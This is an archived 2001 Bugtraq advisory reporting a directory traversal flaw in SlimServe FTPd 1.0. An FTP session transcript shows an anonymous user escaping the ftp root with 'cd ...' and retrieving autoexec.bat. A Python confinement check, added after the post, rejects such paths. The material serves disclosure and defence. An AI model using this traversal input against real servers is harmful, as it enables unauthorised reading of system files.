Bugtraq mailing list archives
Vulnerability in SlimServe FTPd
From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:35:23 -0500
Vulnerability in SlimServe FTPd

Overview

SlimServe FTPd v1.0 is an ftp server available from http://www.whitsoftdev.com and http://www.download.com. A vulnerability exists which allows an attacker to break out of the ftp root using relative paths (ie: '...').

Details

The following is an illustration of the problem. An ftp root of "c:\directory\directory" was used.

% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp>

Solution

No quick fix is possible.

Vendor Status

WhitSoft Development was contacted via <mwhitlock () whitsoftdev com> on Tuesday, February 20, 2001. No reply was received.

- Joe Testa ( e-mail: joetesta () hushmail com / AIM: LordSpankatron )

This message has been signed with a Hush Digital Signature.
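A server-side confinement check that would refuse the "cd ..." and "/.../autoexec.bat" requests shown in the transcript, as an added example that is not part of the original post and not SlimServe's code. The names resolve, PathRejected and ROOT, and the rule of rejecting all-dot or dot/space-terminated components, are assumptions made for illustration; Python's ntpath module is used so Windows path semantics apply on any host.

```python
import ntpath  # Windows path rules regardless of the OS running this

ROOT = r"c:\directory\directory"  # the ftp root quoted in the advisory


class PathRejected(ValueError):
    """Client-supplied path is refused before touching the filesystem."""


def resolve(root, cwd, arg):
    """Map an FTP path argument (CWD/RETR) to a filesystem path under root.

    cwd is the session's virtual directory as a list of components
    ([] means "/"). Returns (new_virtual_components, filesystem_path).
    """
    unified = arg.replace("\\", "/")          # treat both separators alike
    parts = [] if unified.startswith("/") else list(cwd)
    for comp in unified.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()                   # ".." at "/" stays at "/"
            continue
        # Refuse names the OS may reinterpret: all-dot components such as
        # the advisory's "...", trailing dots/spaces, ':' (drive or
        # stream separator) and control characters.
        if (comp.rstrip(". ") != comp or ":" in comp
                or any(ord(c) < 32 for c in comp)):
            raise PathRejected("illegal path component: %r" % comp)
        parts.append(comp)
    full = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: the normalised result must still sit under root.
    base = ntpath.normcase(ntpath.normpath(root))
    if ntpath.commonpath([base, ntpath.normcase(full)]) != base:
        raise PathRejected("path escapes ftp root")
    return parts, full


if __name__ == "__main__":
    # Constructed requests: two from the advisory's session, two benign.
    for request in ("...", "/.../autoexec.bat", "pub/readme.txt", "../.."):
        try:
            print(request, "->", resolve(ROOT, [], request)[1])
        except PathRejected as exc:
            print(request, "-> 550", exc)
```

The check works on the virtual path first and only then builds the filesystem path, so a component the operating system would interpret specially never reaches a file API.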